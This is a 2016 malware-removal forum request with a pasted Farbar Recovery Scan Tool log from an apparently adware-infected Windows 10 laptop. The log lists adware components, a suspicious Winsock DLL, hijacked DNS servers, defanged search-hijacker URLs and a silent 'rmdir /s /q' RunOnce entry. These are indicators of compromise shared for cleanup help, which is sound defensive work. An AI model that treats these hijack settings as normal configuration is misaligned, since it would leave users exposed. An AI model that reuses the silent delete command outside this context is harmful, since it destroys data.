Javascript Disabled Detected

You currently have javascript disabled. Several functions may not work. Please re-enable javascript to access full functionality.

Slow computer, Norton notification says " suspicious outbound traf

Started by LLL31 , Mar 08 2016 06:00 PM

This topic is locked

#1
LLL31

Posted 08 March 2016 - 06:00 PM

Member

Member
15 posts

My computer is freezing up briefly whenever new pages are opened. Occasionally I get a message that I have "suspicious outbound traffic from Norton, and a popup that says my graphic driver has failed and restored itself. Please help

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version:05-03-2016 01
Ran by levilaing (administrator) on LEVISPC (08-03-2016 17:33:26)
Running from C:\Users\levilaing\Downloads
Loaded Profiles: levilaing (Available Profiles: levilaing)
Platform: Windows 10 Home Version 1511 (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: FF)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo...very-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(HP) C:\Program Files (x86)\HP SimplePass\TrueSuiteService.exe
(Intel Corporation) C:\Windows\SysWOW64\IntelCpHeciSvc.exe
(Intel Corporation) C:\Windows\System32\igfxCUIService.exe
(IDT, Inc.) C:\Program Files\IDT\WDM\stacsv64.exe
(Hewlett-Packard Company) C:\Windows\System32\hpservice.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hp\Common\HPSupportSolutionsFrameworkService.exe
(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPWMISVC.exe
(Intel® Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\Jhi_service.exe
() C:\Program Files (x86)\Canon\IJPLM\ijplmsvc.exe
(Fitbit, Inc.) C:\Program Files (x86)\Fitbit Connect\FitbitConnectService.exe
() C:\Program Files\Phrase Professor191220150009\MolacAgafxi.exe
(Symantec Corporation) C:\Program Files (x86)\Norton Security\Engine\22.5.5.15\ns.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe
() C:\Windows\System32\valWBFPolicyService.exe
() C:\Program Files\WindowsApps\Microsoft.Messaging_2.13.20000.0_x86__8wekyb3d8bbwe\SkypeHost.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(Symantec Corporation) C:\Program Files (x86)\Norton Security\Engine\22.5.5.15\ns.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
() C:\Program Files (x86)\HP SimplePass\IEWebSiteLogon.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(Intel Corporation) C:\Windows\System32\igfxEM.exe
(Intel Corporation) C:\Windows\System32\igfxHK.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Realsil Microelectronics Inc.) C:\Program Files (x86)\Realtek\Realtek PCIE Card Reader\RIconMan.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\FWService\IntelMeFWService.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe
(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP CoolSense\CoolSense.exe
(CyberLink) C:\Program Files (x86)\CyberLink\YouCam\YCMMirage.exe
(CyberLink) C:\Program Files (x86)\CyberLink\Power2Go8\CLMLSvc_P2G8.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\UNS.exe
(Microsoft Corporation) C:\Windows\System32\SettingSyncHost.exe
(IDT, Inc.) C:\Program Files\IDT\WDM\sttray64.exe
(Fitbit, Inc.) C:\Program Files (x86)\Fitbit Connect\Fitbit Connect.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\AAM Updates Notifier.exe
() C:\Users\levilaing\AppData\Roaming\Dashlane\Dashlane.exe
() C:\Users\levilaing\AppData\Roaming\Dashlane\DashlanePlugin.exe
(Egis Technology Inc.) C:\Program Files (x86)\EgisTec IPS\PmmUpdate.exe
(Egis Technology Inc.) C:\Program Files (x86)\EgisTec IPS\EgisUpdate.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\Shared\hpqwmiex.exe
(Microsoft Corporation) C:\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.10586.113_none_7689896a26389b16\TiWorker.exe
() C:\Program Files\WindowsApps\Microsoft.Windows.Photos_16.302.8200.0_x64__8wekyb3d8bbwe\Microsoft.Photos.exe
(Microsoft Corporation) C:\Windows\System32\WWAHost.exe
() C:\Program Files\WindowsApps\Microsoft.BingSports_4.8.268.0_x86__8wekyb3d8bbwe\Microsoft.Msn.Sports.exe
() C:\Program Files\WindowsApps\Microsoft.Getstarted_2.6.16.0_x64__8wekyb3d8bbwe\WhatsNew.Store.exe
(Microsoft Corporation) C:\Windows\System32\LockAppHost.exe
() C:\Windows\SystemApps\Microsoft.LockApp_cw5n1h2txyewy\LockApp.exe
(AuthenTec Inc.) C:\Program Files (x86)\HP SimplePass\TouchControl.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(Symantec Corporation) C:\Program Files (x86)\Norton Security\Engine\22.5.5.15\conathst.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe

==================== Registry (Whitelisted) ===========================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [SysTrayApp] => C:\Program Files\IDT\WDM\sttray64.exe [1664000 2013-10-14] (IDT, Inc.)
HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [444904 2012-09-20] (Adobe Systems Incorporated)
HKLM\...\Run: [SynTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [3944136 2015-07-17] (Synaptics Incorporated)
HKLM-x32\...\Run: [RemoteControl10] => C:\Program Files (x86)\CyberLink\PowerDVD10\PDVD10Serv.exe [91432 2012-03-28] (CyberLink Corp.)
HKLM-x32\...\Run: [HP Quick Launch] => C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPMSGSVC.exe [581024 2012-09-07] (Hewlett-Packard Development Company, L.P.)
HKLM-x32\...\Run: [Price Finder] => C:\Program Files (x86)\Price Finder\PriceFinderHelper.exe [43088 2013-11-15] (MindSpark Interactive Network)
HKLM-x32\...\Run: [ShopAtHomeWatcher] => C:\Users\levilaing\AppData\Roaming\ShopAtHome\ShopAtHomeHelper\ShopAtHomeWatcher.exe
HKLM-x32\...\Run: [ShopAtHomeUpdater] => C:\Users\levilaing\AppData\Roaming\ShopAtHome\ShopAtHomeHelper\ShopAtHomeUpdater.exe
HKLM-x32\...\Run: [EgisTecPMMUpdate] => C:\Program Files (x86)\EgisTec IPS\PmmUpdate.exe [401192 2009-12-08] (Egis Technology Inc.)
HKLM-x32\...\Run: [EgisUpdate] => C:\Program Files (x86)\EgisTec IPS\EgisUpdate.exe [201512 2009-12-08] (Egis Technology Inc.)
HKLM-x32\...\Run: [VitaKeyTSR] => C:\Program Files (x86)\Hewlett-Packard\HP SimplePass Identity Protection\EgisTSR.exe [379248 2010-03-25] (Egis Technology Inc. )
HKLM-x32\...\Run: [] => [X]
HKLM-x32\...\Run: [SwitchBoard] => C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [517096 2010-02-19] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [AdobeCS6ServiceManager] => C:\Program Files (x86)\Common Files\Adobe\CS6ServiceManager\CS6ServiceManager.exe [1075296 2013-04-25] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [BCSSync] => C:\Program Files (x86)\Microsoft Office\Office14\BCSSync.exe [89184 2012-11-05] (Microsoft Corporation)
HKLM-x32\...\Run: [Fitbit Connect] => C:\Program Files (x86)\Fitbit Connect\Fitbit Connect.exe [4369952 2014-11-07] (Fitbit, Inc.)
HKLM-x32\...\Run: [Wondershare Helper Compact.exe] => C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\WSHelper.exe
HKLM-x32\...\Run: [BrowserPlugInHelper] => C:\Program Files (x86)\Wondershare\VideoConverterFree\BrowserPlugInHelper.exe [1969440 2013-06-18] ()
HKLM-x32\...\Run: [CanonQuickMenu] => C:\Program Files (x86)\Canon\Quick Menu\CNQMMAIN.EXE [1282120 2013-05-02] (CANON INC.)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [594992 2016-01-29] (Oracle Corporation)
HKU\S-1-5-21-1018505005-2824899964-3694806622-1001\...\Run: [Power2GoExpress8] => C:\Program Files (x86)\CyberLink\Power2Go8\Power2GoExpress8.exe [1711680 2013-01-27] (CyberLink Corp.)
HKU\S-1-5-21-1018505005-2824899964-3694806622-1001\...\Run: [Fitbit Connect] => C:\Program Files (x86)\Fitbit Connect\Fitbit Connect.exe [4369952 2014-11-07] (Fitbit, Inc.)
HKU\S-1-5-21-1018505005-2824899964-3694806622-1001\...\Run: [Dashlane] => C:\Users\levilaing\AppData\Roaming\Dashlane\Dashlane.exe [227712 2016-02-29] ()
HKU\S-1-5-21-1018505005-2824899964-3694806622-1001\...\Run: [DashlanePlugin] => C:\Users\levilaing\AppData\Roaming\Dashlane\DashlanePlugin.exe [285568 2016-02-29] ()
HKU\S-1-5-21-1018505005-2824899964-3694806622-1001\...\RunOnce: [Uninstall C:\Users\levilaing\AppData\Local\Microsoft\OneDrive\17.3.6281.1202_1\amd64] => C:\WINDOWS\system32\cmd.exe /q /c rmdir /s /q "C:\Users\levilaing\AppData\Local\Microsoft\OneDrive\17.3.6281.1202_1\amd64"
HKU\S-1-5-21-1018505005-2824899964-3694806622-1001\...\Policies\Explorer: [NoChangeStartMenu] 0
HKU\S-1-5-21-1018505005-2824899964-3694806622-1001\...\Policies\Explorer: [NoLogOff] 0
Lsa: [Notification Packages] EgisPwdFilter EgisDSPwdFilter
ShellIconOverlayIdentifiers: [ OverlayExcluded] -> {4433A54A-1AC8-432F-90FC-85F045CF383C} => C:\Program Files (x86)\Norton Security\Engine64\22.5.5.15\buShell.dll [2015-11-05] (Symantec Corporation)
ShellIconOverlayIdentifiers: [ OverlayPending] -> {F17C0B1E-EF8E-4AD4-8E1B-7D7E8CB23225} => C:\Program Files (x86)\Norton Security\Engine64\22.5.5.15\buShell.dll [2015-11-05] (Symantec Corporation)
ShellIconOverlayIdentifiers: [ OverlayProtected] -> {476D0EA3-80F9-48B5-B70B-05E677C9C148} => C:\Program Files (x86)\Norton Security\Engine64\22.5.5.15\buShell.dll [2015-11-05] (Symantec Corporation)

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Winsock: Catalog9-x64 01 C:\WINDOWS\system32\Qacsauol64.dll [375144 2015-12-18] ()
Winsock: Catalog9-x64 02 C:\WINDOWS\system32\Qacsauol64.dll [375144 2015-12-18] ()
Winsock: Catalog9-x64 03 C:\WINDOWS\system32\Qacsauol64.dll [375144 2015-12-18] ()
Winsock: Catalog9-x64 04 C:\WINDOWS\system32\Qacsauol64.dll [375144 2015-12-18] ()
Winsock: Catalog9-x64 05 C:\WINDOWS\system32\Qacsauol64.dll [375144 2015-12-18] ()
Tcpip\Parameters: [DhcpNameServer] 68.105.28.11 68.105.29.11 68.105.28.12
Tcpip\Parameters: [NameServer] 82.163.142.7 95.211.158.134
Tcpip\..\Interfaces\{28a014ed-4ae8-49f4-a954-4f38e07b24fb}: [NameServer] 82.163.142.7 95.211.158.134
Tcpip\..\Interfaces\{28a014ed-4ae8-49f4-a954-4f38e07b24fb}: [DhcpNameServer] 82.163.142.7
Tcpip\..\Interfaces\{556f7f8c-c8e8-4a6f-8480-14d98b819937}: [NameServer] 82.163.142.7 95.211.158.134
Tcpip\..\Interfaces\{556f7f8c-c8e8-4a6f-8480-14d98b819937}: [DhcpNameServer] 68.105.28.11 68.105.29.11 68.105.28.12
Tcpip\..\Interfaces\{85ffa754-8db8-4cb7-b1d1-1001444e1282}: [NameServer] 82.163.142.7 95.211.158.134
Tcpip\..\Interfaces\{85ffa754-8db8-4cb7-b1d1-1001444e1282}: [DhcpNameServer] 82.163.142.7

Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://start.mysearchdial.com/?f=1&a=dsites0103&cd=2XzuyEtN2Y1L1Qzu0AtD0BtA0C0CyEzzzzyCzy0FyC0FyBtBtN0D0Tzu0SyByCyCtN1L2XzutBtFtBtFtCyDtFtCyCtAtCtN1L1CzutBtAtDtC1N1R&cr=594446785&ir=
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://start.mysearchdial.com/results.php?f=4&q={searchTerms}&a=dsites0103&cd=2XzuyEtN2Y1L1Qzu0AtD0BtA0C0CyEzzzzyCzy0FyC0FyBtBtN0D0Tzu0SyByCyCtN1L2XzutBtFtBtFtCyDtFtCyCtAtCtN1L1CzutBtAtDtC1N1R&cr=594446785&ir=
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://start.mysearchdial.com/results.php?f=4&q={searchTerms}&a=dsites0103&cd=2XzuyEtN2Y1L1Qzu0AtD0BtA0C0CyEzzzzyCzy0FyC0FyBtBtN0D0Tzu0SyByCyCtN1L2XzutBtFtBtFtCyDtFtCyCtAtCtN1L1CzutBtAtDtC1N1R&cr=594446785&ir=
SearchScopes: HKLM-x32 -> {5a1d0d31-749c-4186-a295-4106e6e7b26a} URL = hxxp://search.tb.ask.com/search/GGmain.jhtml?p2=^AFA^xdm318^YYA^us&si=7cq-b&ptb=BCFD409C-284D-4B07-9DD5-707EAD598BA7&ind=2013111513&n=77fda4d9&psa=&st=sb&searchfor={searchTerms}
SearchScopes: HKU\S-1-5-21-1018505005-2824899964-3694806622-1001 -> DefaultScope {5ED3F37F-AD3B-44DF-AA5A-C1B51FDBDF51} URL = hxxps://search.yahoo.com/search?fr=chr-greentree_ie&ei=utf-8&ilc=12&type=282369&p={searchTerms}
SearchScopes: HKU\S-1-5-21-1018505005-2824899964-3694806622-1001 -> {5a1d0d31-749c-4186-a295-4106e6e7b26a} URL = hxxp://search.tb.ask.com/search/GGmain.jhtml?p2=^AFA^xdm318^YYA^us&si=7cq-b&ptb=BCFD409C-284D-4B07-9DD5-707EAD598BA7&ind=2013111513&n=77fda4d9&psa=&st=sb&searchfor={searchTerms}
SearchScopes: HKU\S-1-5-21-1018505005-2824899964-3694806622-1001 -> {5ED3F37F-AD3B-44DF-AA5A-C1B51FDBDF51} URL = hxxps://search.yahoo.com/search?fr=chr-greentree_ie&ei=utf-8&ilc=12&type=282369&p={searchTerms}
SearchScopes: HKU\S-1-5-21-1018505005-2824899964-3694806622-1001 -> {AFBCB7E0-F91A-4951-9F31-58FEE57A25C4} URL = hxxp://nortonsafe.search.ask.com/web?q={SEARCHTERMS}&o=APN10506&l=dis&prt=NS&chn=oem&geo=US&ver=22&locale=en_US&gct=kwd&qsrc=2869
SearchScopes: HKU\S-1-5-21-1018505005-2824899964-3694806622-1001 -> {cf34d395-9ff1-49a0-98a5-8db1636431b1} URL = hxxp://houmpage.com/search/?src=ds&q={searchTerms}&ssid=1450481507&a=1024151&uuid=7e89bdc6-7099-4da4-a7cc-3fa3a69a6cef
BHO: Phrase Professor191220150009 -> {45A8F68D-05A0-4573-8D3D-72E45371DEB8} -> C:\Program Files\Phrase Professor191220150009\Eiijanmy64.dll [2015-12-18] ()
BHO: Norton Identity Protection -> {602ADB0E-4AFF-4217-8AA1-95DAC4DFA408} -> C:\Program Files (x86)\Norton Security\Engine64\22.5.5.15\coIEPlg.dll [2015-11-05] (Symantec Corporation)
BHO: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files\Microsoft Office\Office14\GROOVEEX.DLL [2013-12-19] (Microsoft Corporation)
BHO: EgisPBIE Class -> {7B51CCBE-4AF9-44A6-BDAB-D7F7E4C4E6F9} -> C:\Program Files (x86)\Hewlett-Packard\HP SimplePass Identity Protection\x64\EgisPBIE.dll [2010-03-25] (Egis Technology Inc.)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL [2013-03-06] (Microsoft Corporation)
BHO-x32: Dashlane BHO -> {42D79B50-CC4A-4A8E-860F-BE674AF053A2} -> C:\Users\levilaing\AppData\Roaming\Dashlane\ie\Dashlanei.dll [2016-02-29] (Dashlane)
BHO-x32: Phrase Professor191220150009 -> {45A8F68D-05A0-4573-8D3D-72E45371DEB8} -> C:\Program Files\Phrase Professor191220150009\Eiijanmy.dll [2015-12-18] ()
BHO-x32: Norton Identity Protection -> {602ADB0E-4AFF-4217-8AA1-95DAC4DFA408} -> C:\Program Files (x86)\Norton Security\Engine\22.5.5.15\coIEPlg.dll [2015-11-05] (Symantec Corporation)
BHO-x32: Wondershare Video Converter Ultimate -> {65DEE40A-3E93-4cae-9F98-B8E06DCEE2BF} -> C:\Program Files (x86)\Wondershare\VideoConverterFree\SVRIEPlugin.dll [2013-06-18] (Wondershare Software Co., Ltd.)
BHO-x32: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files (x86)\Microsoft Office\Office14\GROOVEEX.DLL [2013-12-19] (Microsoft Corporation)
BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_73\bin\ssv.dll [2016-02-17] (Oracle Corporation)
BHO-x32: EgisPBIE Class -> {7B51CCBE-4AF9-44A6-BDAB-D7F7E4C4E6F9} -> C:\Program Files (x86)\Hewlett-Packard\HP SimplePass Identity Protection\EgisPBIE.dll [2010-03-25] (Egis Technology Inc.)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL [2013-03-06] (Microsoft Corporation)
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_73\bin\jp2ssv.dll [2016-02-17] (Oracle Corporation)
Toolbar: HKLM - Norton Toolbar - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - C:\Program Files (x86)\Norton Security\Engine64\22.5.5.15\coIEPlg.dll [2015-11-05] (Symantec Corporation)
Toolbar: HKLM-x32 - Dashlane Toolbar - {669695BC-A811-4A9D-8CDF-BA8C795F261C} - C:\Users\levilaing\AppData\Roaming\Dashlane\ie\KWIEBar.dll [2016-02-29] (Dashlane)
Toolbar: HKLM-x32 - Norton Toolbar - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - C:\Program Files (x86)\Norton Security\Engine\22.5.5.15\coIEPlg.dll [2015-11-05] (Symantec Corporation)
Toolbar: HKU\S-1-5-21-1018505005-2824899964-3694806622-1001 -> No Name - {759D9886-0C6F-4498-BAB6-4A5F47C6C72F} - No File
Toolbar: HKU\S-1-5-21-1018505005-2824899964-3694806622-1001 -> Norton Toolbar - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - C:\Program Files (x86)\Norton Security\Engine64\22.5.5.15\coIEPlg.dll [2015-11-05] (Symantec Corporation)

FireFox:
========
FF ProfilePath: C:\Users\levilaing\AppData\Roaming\Mozilla\Firefox\Profiles\20re3c18.default
FF NewTab: hxxp://www-searching.com/?site=shyosffdefault&prd=set_ff&s=FCIztutbl11,6716c22f-1031-4942-a662-741aed4da972,
FF DefaultSearchEngine: DuckDuckGo
FF DefaultSearchEngine.US: DuckDuckGo
FF SelectedSearchEngine: DuckDuckGo
FF Homepage: about:home
FF Keyword.URL: hxxps://search.yahoo.com/search?fr=greentree_ff1&ei=utf-8&ilc=12&type=282369&p=
FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF64_20_0_0_306.dll [2016-02-09] ()
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.41212.0\npctrl.dll [2015-12-11] ( Microsoft Corporation)
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~1\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect64.dll [2012-09-20] (Adobe Systems)
FF Plugin: adobe.com/AdobeExManDetect -> C:\Program Files (x86)\Adobe\Adobe Extension Manager CS6\Win64Plugin\npAdobeExManDetectX64.dll [2013-12-02] (Adobe Systems)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\WINDOWS\SysWOW64\Macromed\Flash\NPSWF32_20_0_0_306.dll [2016-02-09] ()
FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\Windows\SysWOW64\Adobe\Director\np32dsw_1205146.dll [2013-10-25] (Adobe Systems, Inc.)
FF Plugin-x32: @authentec.com/ffwloplugin -> C:\Program Files (x86)\HP SimplePass\npffwloplugin.dll [2013-06-07] ( HP)
FF Plugin-x32: @CouponXplorer_5z.com/Plugin -> C:\Program Files (x86)\CouponXplorer_5z\bar\1.bin\NP5zStub.dll [2013-11-15] (MindSpark)
FF Plugin-x32: @google.com/npPicasa3,version=3.0.0 -> C:\Program Files (x86)\Google\Picasa3\npPicasa3.dll [2015-10-13] (Google, Inc.)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=2.1.42 -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIIPT.dll [2012-06-06] (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2012-06-06] (Intel Corporation)
FF Plugin-x32: @java.com/DTPlugin,version=11.73.2 -> C:\Program Files (x86)\Java\jre1.8.0_73\bin\dtplugin\npDeployJava1.dll [2016-02-17] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.73.2 -> C:\Program Files (x86)\Java\jre1.8.0_73\bin\plugin2\npjp2.dll [2016-02-17] (Oracle Corporation)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.41212.0\npctrl.dll [2015-12-11] ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPSPWRAP.DLL [2010-03-24] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3528.0331 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2014-03-31] (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-02-02] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-02-02] (Google Inc.)
FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect32.dll [2012-09-20] (Adobe Systems)
FF Plugin-x32: adobe.com/AdobeExManDetect -> C:\Program Files (x86)\Adobe\Adobe Extension Manager CS6\npAdobeExManDetectX86.dll [2013-12-02] (Adobe Systems)
FF Plugin HKU\S-1-5-21-1018505005-2824899964-3694806622-1001: tdameritrade.com/thinkorswim -> C:\Program Files (x86)\thinkorswim\npthinkorswim.dll [No File]
FF Plugin HKU\S-1-5-21-1018505005-2824899964-3694806622-1001: tdameritrade.com/tossc -> C:\Program Files (x86)\thinkorswim\nptossc.dll [No File]
FF user.js: detected! => C:\Users\levilaing\AppData\Roaming\Mozilla\Firefox\Profiles\20re3c18.default\user.js [2015-12-18]
FF SearchPlugin: C:\Users\levilaing\AppData\Roaming\Mozilla\Firefox\Profiles\20re3c18.default\searchplugins\duckduckgo.xml [2014-10-16]
FF SearchPlugin: C:\Users\levilaing\AppData\Roaming\Mozilla\Firefox\Profiles\20re3c18.default\searchplugins\norton-safe-search.xml [2016-01-13]
FF SearchPlugin: C:\Users\levilaing\AppData\Roaming\Mozilla\Firefox\Profiles\20re3c18.default\searchplugins\smod.xml [2015-12-18]
FF SearchPlugin: C:\Users\levilaing\AppData\Roaming\Mozilla\Firefox\Profiles\20re3c18.default\searchplugins\yahoo_ff.xml [2014-07-31]
FF SearchPlugin: C:\Users\levilaing\AppData\Roaming\Mozilla\Firefox\Profiles\20re3c18.default\searchplugins\youtube-video-search.xml [2015-08-20]
FF Extension: Ixquick Toolbar - C:\Users\levilaing\AppData\Roaming\Mozilla\Firefox\Profiles\20re3c18.default\extensions\{0D4B5813-2CB5-439D-839C-4638597EFAFA}.xpi [2016-01-12]
FF Extension: Dashlane - C:\Users\levilaing\AppData\Roaming\Mozilla\Firefox\Profiles\20re3c18.default\Extensions\[email protected] [2015-12-22]
FF Extension: DuckDuckGo Plus - C:\Users\levilaing\AppData\Roaming\Mozilla\Firefox\Profiles\20re3c18.default\Extensions\[email protected] [2015-06-02]
FF Extension: TrueSuite Website Logon - C:\Program Files (x86)\Mozilla Firefox\distribution\bundles\[email protected] [2016-02-12] [not signed]
FF HKLM\...\Firefox\Extensions: [{45A8F68D-05A0-4573-8D3D-72E45371DEB8}] - C:\Program Files\Phrase Professor191220150009\Firefox\{45A8F68D-05A0-4573-8D3D-72E45371DEB8}.xpi
FF Extension: Phrase Professor191220150009 - C:\Program Files\Phrase Professor191220150009\Firefox\{45A8F68D-05A0-4573-8D3D-72E45371DEB8}.xpi [2015-12-18] [not signed]
FF HKLM\...\Firefox\Extensions: [{C1A2A613-35F1-4FCF-B27F-2840527B6556}] - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NS_22.5.4.24\coFFAddon
FF Extension: Norton Identity Safe - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NS_22.5.4.24\coFFAddon [2016-01-18]
FF HKLM-x32\...\Firefox\Extensions: [{41ecbc0b-34d5-4cd4-935f-253a30e2cb7e}] - C:\Program Files (x86)\Hewlett-Packard\HP SimplePass Identity Protection\FFExt
FF Extension: SimplePass Online Accounts Extension - C:\Program Files (x86)\Hewlett-Packard\HP SimplePass Identity Protection\FFExt [2013-12-13] [not signed]
FF HKLM-x32\...\Firefox\Extensions: [{8D150B8F-EFE8-45a3-A4A3-053020F48FAC}] - C:\Program Files (x86)\Wondershare\VideoConverterFree\SVRFirefoxExt
FF Extension: Wondershare Video Converter Ultimate - C:\Program Files (x86)\Wondershare\VideoConverterFree\SVRFirefoxExt [2015-07-09] [not signed]
FF HKLM-x32\...\Firefox\Extensions: [{45A8F68D-05A0-4573-8D3D-72E45371DEB8}] - C:\Program Files\Phrase Professor191220150009\Firefox\{45A8F68D-05A0-4573-8D3D-72E45371DEB8}.xpi
FF HKLM-x32\...\Firefox\Extensions: [{C1A2A613-35F1-4FCF-B27F-2840527B6556}] - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NS_22.5.4.24\coFFAddon
FF HKU\S-1-5-21-1018505005-2824899964-3694806622-1001\...\Firefox\Extensions: [{8D150B8F-EFE8-45a3-A4A3-053020F48FAC}] - C:\Program Files (x86)\Wondershare\VideoConverterFree\SVRFirefoxExt

Chrome:
=======
CHR HomePage: Default -> hxxp://www-searching.com/?pid=s&s=FCIztutbl11,6716c22f-1031-4942-a662-741aed4da972,&vp=ch&prd=set_ch
CHR StartupUrls: Default -> "hxxp://www-searching.com/?pid=s&s=FCIztutbl11,6716c22f-1031-4942-a662-741aed4da972,&vp=ch&prd=set_ch"
CHR DefaultSuggestURL: Default -> hxxp://api.searchpredict.com/api/?rqtype=ffplugin&siteID=8661&dbCode=1&command={searchTerms}
CHR Profile: C:\Users\levilaing\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Docs) - C:\Users\levilaing\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2014-07-07]
CHR Extension: (Google Drive) - C:\Users\levilaing\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2014-07-07]
CHR Extension: (YouTube) - C:\Users\levilaing\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2014-07-07]
CHR Extension: (McAfee Security Scan+) - C:\Users\levilaing\AppData\Local\Google\Chrome\User Data\Default\Extensions\bopakagnckmlgajfccecajhnimjiiedh [2014-07-07]
CHR Extension: (Google Search) - C:\Users\levilaing\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2014-07-07]
